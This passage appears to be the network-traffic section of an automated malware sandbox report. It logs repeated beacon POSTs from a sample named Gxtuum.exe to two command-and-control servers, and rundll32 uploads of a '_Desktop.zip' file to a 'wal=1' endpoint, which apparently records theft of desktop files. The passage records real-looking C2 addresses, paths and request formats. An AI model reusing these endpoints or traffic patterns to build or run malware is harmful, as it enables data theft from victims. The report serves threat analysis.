                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:27.440025091 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:26 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.449763185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:29.144040108 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:30.477885962 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:29 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.449764185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:29.191658974 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:30.534275055 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:29 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.449765185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:32.124402046 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:33.475101948 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:32 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.449766185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:32.186872005 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:33.551990986 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:32 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.449767185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:35.217941046 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:36.565433025 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:35 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.449768185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:35.305869102 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:36.645472050 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:35 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.449769185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:38.211528063 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:39.581466913 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:38 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.449770185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:38.293263912 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:39.660887003 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:38 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.449771185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:41.419322014 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:42.767491102 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:42 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.449772185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:41.490995884 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:42.831105947 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:42 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.449773185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:44.391789913 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:45.753319025 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:45 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.449774185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:44.468204975 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:45.831269979 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:45 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.449775185.81.68.147801220C:\Windows\System32\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:45.785799980 CET169OUTPOST /7vhfjke3/index.php?wal=1 HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----NDYxNQ==
                                                              Host: 185.81.68.147
                                                              Content-Length: 4775
                                                              Cache-Control: no-cache
                                                              Dec 13, 2024 07:47:45.785877943 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4e 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                              Data Ascii: ------NDYxNQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                              Dec 13, 2024 07:47:45.785990000 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                              Data Ascii: PK
                                                              Dec 13, 2024 07:47:45.786058903 CET8OUTData Raw: 08 00 51 40 44 57 ba eb
                                                              Data Ascii: Q@DW
                                                              Dec 13, 2024 07:47:45.786094904 CET8OUTData Raw: bd 05 84 02 00 00 02 04
                                                              Data Ascii:
                                                              Dec 13, 2024 07:47:45.786119938 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                              Data Ascii: _F
                                                              Dec 13, 2024 07:47:45.786161900 CET8OUTData Raw: 69 6c 65 73 5f 5c 44 56
                                                              Data Ascii: iles_\DV
                                                              Dec 13, 2024 07:47:45.786185026 CET8OUTData Raw: 57 48 4b 4d 4e 46 4e 4e
                                                              Data Ascii: WHKMNFNN
                                                              Dec 13, 2024 07:47:45.786226988 CET8OUTData Raw: 2e 78 6c 73 78 15 93 49
                                                              Data Ascii: .xlsxI
                                                              Dec 13, 2024 07:47:45.786262035 CET8OUTData Raw: 72 40 21 08 44 f7 a9 ca
                                                              Data Ascii: r@!D
                                                              Dec 13, 2024 07:47:45.786288977 CET8OUTData Raw: a1 1c 3f 0e a8 88 e2 70
                                                              Data Ascii: ?p
                                                              Dec 13, 2024 07:47:47.245563984 CET198INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:46 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 1
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.449776185.81.68.147803272C:\Windows\System32\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:45.843095064 CET169OUTPOST /7vhfjke3/index.php?wal=1 HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----NDYxNQ==
                                                              Host: 185.81.68.147
                                                              Content-Length: 4775
                                                              Cache-Control: no-cache
                                                              Dec 13, 2024 07:47:45.843203068 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4e 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                              Data Ascii: ------NDYxNQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                              Dec 13, 2024 07:47:45.843203068 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                              Data Ascii: PK
                                                              Dec 13, 2024 07:47:45.843282938 CET8OUTData Raw: 08 00 51 40 44 57 ba eb
                                                              Data Ascii: Q@DW
                                                              Dec 13, 2024 07:47:45.843338966 CET8OUTData Raw: bd 05 84 02 00 00 02 04
                                                              Data Ascii:
                                                              Dec 13, 2024 07:47:45.843367100 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                              Data Ascii: _F
                                                              Dec 13, 2024 07:47:45.843390942 CET8OUTData Raw: 69 6c 65 73 5f 5c 44 56
                                                              Data Ascii: iles_\DV
                                                              Dec 13, 2024 07:47:45.843416929 CET8OUTData Raw: 57 48 4b 4d 4e 46 4e 4e
                                                              Data Ascii: WHKMNFNN
                                                              Dec 13, 2024 07:47:45.843462944 CET8OUTData Raw: 2e 78 6c 73 78 15 93 49
                                                              Data Ascii: .xlsxI
                                                              Dec 13, 2024 07:47:45.843522072 CET8OUTData Raw: 72 40 21 08 44 f7 a9 ca
                                                              Data Ascii: r@!D
                                                              Dec 13, 2024 07:47:45.843564987 CET8OUTData Raw: a1 1c 3f 0e a8 88 e2 70
                                                              Data Ascii: ?p
                                                              Dec 13, 2024 07:47:47.310436010 CET198INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:46 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 1
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.449777185.81.68.148801220C:\Windows\System32\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:47.367950916 CET172OUTPOST /8Fvu5jh4DbS/index.php?wal=1 HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----NDYxNQ==
                                                              Host: 185.81.68.148
                                                              Content-Length: 4775
                                                              Cache-Control: no-cache
                                                              Dec 13, 2024 07:47:47.368036985 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4e 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                              Data Ascii: ------NDYxNQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                              Dec 13, 2024 07:47:47.368093967 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                              Data Ascii: PK
                                                              Dec 13, 2024 07:47:47.368123055 CET8OUTData Raw: 08 00 51 40 44 57 ba eb
                                                              Data Ascii: Q@DW
                                                              Dec 13, 2024 07:47:47.368139982 CET8OUTData Raw: bd 05 84 02 00 00 02 04
                                                              Data Ascii:
                                                              Dec 13, 2024 07:47:47.368160009 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                              Data Ascii: _F
                                                              Dec 13, 2024 07:47:47.368181944 CET8OUTData Raw: 69 6c 65 73 5f 5c 44 56
                                                              Data Ascii: iles_\DV
                                                              Dec 13, 2024 07:47:47.368206978 CET8OUTData Raw: 57 48 4b 4d 4e 46 4e 4e
                                                              Data Ascii: WHKMNFNN
                                                              Dec 13, 2024 07:47:47.368227959 CET8OUTData Raw: 2e 78 6c 73 78 15 93 49
                                                              Data Ascii: .xlsxI
                                                              Dec 13, 2024 07:47:47.368247986 CET8OUTData Raw: 72 40 21 08 44 f7 a9 ca
                                                              Data Ascii: r@!D
                                                              Dec 13, 2024 07:47:47.368271112 CET8OUTData Raw: a1 1c 3f 0e a8 88 e2 70
                                                              Data Ascii: ?p
                                                              Dec 13, 2024 07:47:48.910877943 CET198INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:48 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 1
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.449778185.81.68.148803272C:\Windows\System32\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:47.432440996 CET172OUTPOST /8Fvu5jh4DbS/index.php?wal=1 HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----NDYxNQ==
                                                              Host: 185.81.68.148
                                                              Content-Length: 4775
                                                              Cache-Control: no-cache
                                                              Dec 13, 2024 07:47:47.432492018 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4e 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                              Data Ascii: ------NDYxNQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                              Dec 13, 2024 07:47:47.432549000 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                              Data Ascii: PK
                                                              Dec 13, 2024 07:47:47.432576895 CET8OUTData Raw: 08 00 51 40 44 57 ba eb
                                                              Data Ascii: Q@DW
                                                              Dec 13, 2024 07:47:47.432611942 CET8OUTData Raw: bd 05 84 02 00 00 02 04
                                                              Data Ascii:
                                                              Dec 13, 2024 07:47:47.432637930 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                              Data Ascii: _F
                                                              Dec 13, 2024 07:47:47.432661057 CET8OUTData Raw: 69 6c 65 73 5f 5c 44 56
                                                              Data Ascii: iles_\DV
                                                              Dec 13, 2024 07:47:47.432682991 CET8OUTData Raw: 57 48 4b 4d 4e 46 4e 4e
                                                              Data Ascii: WHKMNFNN
                                                              Dec 13, 2024 07:47:47.432717085 CET8OUTData Raw: 2e 78 6c 73 78 15 93 49
                                                              Data Ascii: .xlsxI
                                                              Dec 13, 2024 07:47:47.432769060 CET8OUTData Raw: 72 40 21 08 44 f7 a9 ca
                                                              Data Ascii: r@!D
                                                              Dec 13, 2024 07:47:47.432769060 CET8OUTData Raw: a1 1c 3f 0e a8 88 e2 70
                                                              Data Ascii: ?p
                                                              Dec 13, 2024 07:47:49.022649050 CET198INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:48 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 1
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.449779185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:47.602010012 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:48.962125063 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:48 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              43192.168.2.449780185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:47.620568037 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:48.976391077 CET205INHTTP/1.1 200 OK
